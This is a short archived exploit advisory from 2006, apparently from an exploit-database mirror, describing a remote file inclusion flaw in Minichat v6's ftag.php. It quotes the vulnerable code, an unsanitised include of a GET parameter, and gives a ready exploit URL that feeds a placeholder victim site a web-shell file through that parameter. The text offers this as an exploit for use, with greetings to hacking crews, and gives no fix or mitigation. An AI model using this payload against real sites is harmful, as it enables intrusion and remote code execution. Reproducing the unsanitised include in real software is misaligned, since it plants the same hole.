[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Minichat v6 (ftag.php) Remote File Include Vulnerability
# Published : 2006-10-11
# Author : Zickox
# Previous Title : SH-News <= 3.1 (scriptpath) Multiple Remote File Include Vulnerabilities
# Next Title : Flatnuke 2.5.8 (userlang) Local Inclusion / Delete All Users Exploit
###############################################################################################################
Minichat v6 Remote File Include
###############################################################################################################
Affected Software .: Minichat v6
Class................... : Remote File Inclusion
Found by.............: Zickox
Contact. ...............: los_misfits[at]hotmail.com
###############################################################################################################
Download Software:
http://www.linkini.net/phpscripts/descargas/Tagboards%20(12%20Archivos)/Minichat%20v6.0%20-%20Con%20instalador.zip
###############################################################################################################
Affected File:
ftag.php
###############################################################################################################
Code vulnerable:
<? include($_GET['mostrar']); ?>
###############################################################################################################
Exploit:
http://www.victim.com/path/ftag.php?mostrar=shell.txt?
###############################################################################################################
Special GreetingS: NETTOXIC | Txis | The Shredder | erboot | trty | jasus | Cvir.System | ZeroHack Team
# www.Syue.com [2006-10-11]